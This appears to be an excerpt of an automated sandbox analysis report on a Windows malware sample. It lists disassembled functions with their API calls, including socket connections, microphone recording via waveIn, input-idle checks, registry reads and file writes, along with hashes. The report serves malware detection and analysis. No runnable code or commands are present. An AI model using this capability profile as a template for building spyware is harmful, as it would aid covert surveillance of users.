                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                                • String ID:
                                                • API String ID: 14144500-0
                                                • Opcode ID: 2114117409363cb7e78d10ac3ab9084722833f47b2dbd8b20faa7acfed98e52e
                                                • Instruction ID: a76af5b82299ebda6258fe3f6a6f3d77803a8337d0e4312578fc71cb36422cf8
                                                • Opcode Fuzzy Hash: 2114117409363cb7e78d10ac3ab9084722833f47b2dbd8b20faa7acfed98e52e
                                                • Instruction Fuzzy Hash: 84E059355101159BCB05AFA1ED5D5ED7724FB50716B50887AE112E20E0DF789A05CB58
                                                Function 0040442D Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040443D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404446
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040444F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404458
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404461
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                                • String ID:
                                                • API String ID: 1976170855-0
                                                • Opcode ID: 03c545faca985665e0c8ba26c08273c866a097cbcaf35bcbc1d0b21ce57e4c9d
                                                • Instruction ID: 744c3aaffa62b8f2256cac924ed8e72aba2ee04e51500d82d91f53dcfe42f784
                                                • Opcode Fuzzy Hash: 03c545faca985665e0c8ba26c08273c866a097cbcaf35bcbc1d0b21ce57e4c9d
                                                • Instruction Fuzzy Hash: D5E092300006068BC728AF10E9698E97BA0FA11B0630086BAA083424B4DB74AA4ACB48
                                                Function 00404369 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?), ref: 0040437B
                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?), ref: 00404388
                                                • _CxxThrowException.MSVCRT(?,00414E88), ref: 00404397
                                                  • Part of subcall function 004127A4: free.MSVCRT ref: 004127A8
                                                Strings
                                                • invalid vector<T> subscript, xrefs: 00404376
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@free
                                                • String ID: invalid vector<T> subscript
                                                • API String ID: 2273067808-3016609489
                                                • Opcode ID: 0b42328fae8077a33961002d12bebb873a1c99fc6605dcd5c90a3402ee653f6f
                                                • Instruction ID: 9081e0b97f3d86b390c45543bc86d2b2cd79dda824f32b6c334bb704bc22525b
                                                • Opcode Fuzzy Hash: 0b42328fae8077a33961002d12bebb873a1c99fc6605dcd5c90a3402ee653f6f
                                                • Instruction Fuzzy Hash: BAE01A3185421FBB8F04FBE1EE46CEEB77CFA20715B104026F514A2090EA75A659CB69
                                                Function 004012C8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,004012A3,)A,00419BC8,?,00408551,00000003,00000000), ref: 004012DA
                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(00419BC8,?,?,?,?,?,004012A3,)A,00419BC8,?,00408551,00000003,00000000), ref: 004012E7
                                                • _CxxThrowException.MSVCRT(?,00414E88), ref: 004012F6
                                                  • Part of subcall function 00401305: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00401300,?,?,?,?,?,004012A3,)A,00419BC8,?,00408551,00000003,00000000), ref: 00401312
                                                Strings
                                                • invalid vector<T> subscript, xrefs: 004012D5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$??0?$basic_string@D@std@@$??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionG@1@@G@2@@std@@G@std@@ThrowV?$basic_string@
                                                • String ID: invalid vector<T> subscript
                                                • API String ID: 2940198921-3016609489
                                                • Opcode ID: 49323ef09bc0a592db922291846fb59359dc7f77e4d0353e1e64f42a068a7557
                                                • Instruction ID: d8976807297c62d01572152810665a8d5db05232c0cf254fa88bf72be88a025b
                                                • Opcode Fuzzy Hash: 49323ef09bc0a592db922291846fb59359dc7f77e4d0353e1e64f42a068a7557
                                                • Instruction Fuzzy Hash: F5E0127195021EABDF00FBE1D946DED737CBA107067100066B802B2491EA7856458B6A
                                                Function 0040F051 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F060
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F067
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetCursorInfo$User32.dll
                                                • API String ID: 1646373207-2714051624
                                                • Opcode ID: 00c0f802b49c2a8e6a9f6ce9733f41d5ca5fdd640df29dd6ecd660fe81da5ccc
                                                • Instruction ID: 8c2af54e6974973217ce2fc124f3aefe2ad0fa30a810d026115205a33ac96366
                                                • Opcode Fuzzy Hash: 00c0f802b49c2a8e6a9f6ce9733f41d5ca5fdd640df29dd6ecd660fe81da5ccc
                                                • Instruction Fuzzy Hash: D4C09BB15C0300B7C7106FA0AC0D9D63E546944787325803AF502911D5DBBA07C0575D
                                                Function 00412420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0041242F
                                                • GetProcAddress.KERNEL32(00000000), ref: 00412436
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetConsoleWindow$kernel32.dll
                                                • API String ID: 2574300362-100875112
                                                • Opcode ID: 2848b05bbf0d105ac815b46be2fe068eeccfffed3874a5221256f0aa874a9e33
                                                • Instruction ID: 656b5861eb12fb975ada1a3577eec1db76f4e2637a3b0ace9dfd4a9094a3eac2
                                                • Opcode Fuzzy Hash: 2848b05bbf0d105ac815b46be2fe068eeccfffed3874a5221256f0aa874a9e33
                                                • Instruction Fuzzy Hash: 88C092B0580300BB8A005FA0FE4DAC43B24A68871FB208036F606E21A8DABC02C19B1E
                                                Function 00410CB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00410CBF
                                                • GetProcAddress.KERNEL32(00000000), ref: 00410CC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetLastInputInfo$User32.dll
                                                • API String ID: 2574300362-1519888992
                                                • Opcode ID: 788472ad7e9fc500dc71e77681d8766f48d7b3fa82a04b1b4c3325b9c869b2fa
                                                • Instruction ID: d159ac18f343f7fde4e1b487c82bbfb71f31a115f8096194abb0d36129630029
                                                • Opcode Fuzzy Hash: 788472ad7e9fc500dc71e77681d8766f48d7b3fa82a04b1b4c3325b9c869b2fa
                                                • Instruction Fuzzy Hash: 0EC092F15C4300FBD6045FB0AD0DBC83A64AA9874B3218122FA0BE1168EBB881C19B1D
                                                Function 004118F7 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(6C9BB310,40000000,00000000,00000000,00000002,00000080,00000000,004137F0,6C9BB310), ref: 00411934
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00411950
                                                • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00411967
                                                • CloseHandle.KERNEL32(00000000), ref: 00411974
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandlePointerWrite
                                                • String ID:
                                                • API String ID: 3604237281-0
                                                • Opcode ID: 54e626bad9dc498234e029e8a41b20420491624d6dd0ef8c24343bbdc3588faf
                                                • Instruction ID: 20ccb315012f3852ca45e84d2ac00785bb081a4d5b6ce7da124fd9a85787cd1d
                                                • Opcode Fuzzy Hash: 54e626bad9dc498234e029e8a41b20420491624d6dd0ef8c24343bbdc3588faf
                                                • Instruction Fuzzy Hash: 121184B1514119BFDF108F949C99EEF7B6CEF06364F108126FA21A22A0C3758F80DB68
                                                Function 00402808 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402817
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402850
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402863
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00402899,00000001,00000073), ref: 0040288E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                                • String ID:
                                                • API String ID: 182292213-0
                                                • Opcode ID: 17ed0322c0e1e7ea1fff0cb00368a6ffbcdae5775f810179b19fef1d942b7dcc
                                                • Instruction ID: 9cd21683212efc4aa8640c2a6815c2dda1cd8d6ad557ecdc1423125fdbafe0b4
                                                • Opcode Fuzzy Hash: 17ed0322c0e1e7ea1fff0cb00368a6ffbcdae5775f810179b19fef1d942b7dcc
                                                • Instruction Fuzzy Hash: 6901F53670020467DB04BF75DD5DAEE3B59DB45741F00C53AFA069B2D1CAB99A048399
                                                Function 0040147C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,00401465,00000000), ref: 00401498
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,00401465,00000000), ref: 004014B0
                                                • waveInPrepareHeader.WINMM(020F1298,00000020,?,?,00401465,00000000), ref: 00401508
                                                • waveInAddBuffer.WINMM(?,00000020,?,?,00401465,00000000), ref: 0040151E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                                • String ID:
                                                • API String ID: 1952094867-0
                                                • Opcode ID: 26c6a36dd7bbb63933669df2c2b8bba8791c050adbd666b5a3399c72024d0a02
                                                • Instruction ID: f17f4ceaa08dfeeeee09c7c5df7380e211e29170c5ae5cc7640f9480da3aabed
                                                • Opcode Fuzzy Hash: 26c6a36dd7bbb63933669df2c2b8bba8791c050adbd666b5a3399c72024d0a02
                                                • Instruction Fuzzy Hash: F411FE35A00201AFDB559F59EC6C9A67BB6E789354704C47EE80A873A1D731AC81CB4C
                                                Function 0040A87F Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040A8AE
                                                • RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000000,?,00000400), ref: 0040A8CB
                                                • RegCloseKey.ADVAPI32(80000002), ref: 0040A8D4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040A8F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                                • String ID:
                                                • API String ID: 2462357041-0
                                                • Opcode ID: c884979b86058426f5f096c3ef9973eeefe197d8f8595adf70f6e09100c1f719
                                                • Instruction ID: 54ab7706094e25af14277e1d9514c3cbf2968475ca837108f2d9fa6d11a1ab20
                                                • Opcode Fuzzy Hash: c884979b86058426f5f096c3ef9973eeefe197d8f8595adf70f6e09100c1f719
                                                • Instruction Fuzzy Hash: 430108B610024DBFDB11DF50DD84DEB7B7CAB08345F108072FB01A6161D3349E659B69
                                                Function 0040A8FF Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040A920
                                                • RegQueryValueExW.ADVAPI32(80000000,00410E9A,00000000,00000000,?,00000400), ref: 0040A93F
                                                • RegCloseKey.ADVAPI32(80000000), ref: 0040A948
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 0040A967
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                                • String ID:
                                                • API String ID: 4081865614-0
                                                • Opcode ID: 98ecfca368624ee8de829ecc2d3fdaf87d5e7851d24a333a835950b47d42dbd1
                                                • Instruction ID: 95b0be73f78a16d01168a07f17b39e84a5986b45995bd83b0fb42d7a6040a34d
                                                • Opcode Fuzzy Hash: 98ecfca368624ee8de829ecc2d3fdaf87d5e7851d24a333a835950b47d42dbd1
                                                • Instruction Fuzzy Hash: 0501E4B514020DBFDB11DF50DD45FEA7BB9BB08345F508061BA15A61A0D770AB189B98
                                                Function 0040DE9E Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040DEB5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040DECC
                                                  • Part of subcall function 0040A163: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 0040A1A3
                                                  • Part of subcall function 0040A163: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040A1AD
                                                  • Part of subcall function 0040A163: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040A1C1
                                                  • Part of subcall function 0040A163: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040A1EC,00000000,?,?,?,?,?,?), ref: 0040A1D8
                                                  • Part of subcall function 0040A163: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040A1E1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@
                                                • String ID:
                                                • API String ID: 2535041984-0
                                                • Opcode ID: 3ccef75f041d4d4d0a5691df4d50caaff344adf0730f9f079690a04cfa119231
                                                • Instruction ID: c68130228d9fa56fda123ebc79ea6802f012a8b7dc68e290332186b0a330a496
                                                • Opcode Fuzzy Hash: 3ccef75f041d4d4d0a5691df4d50caaff344adf0730f9f079690a04cfa119231
                                                • Instruction Fuzzy Hash: 3BF054355011158BCB04FBB6EDAA5FE7B24FB51705F0088BEE413A71E2EA794604CB99
                                                Function 004080E4 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00408E3E,?,?), ref: 004080F4
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00408E3E,?,?), ref: 0040810B
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00408123
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0040812C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
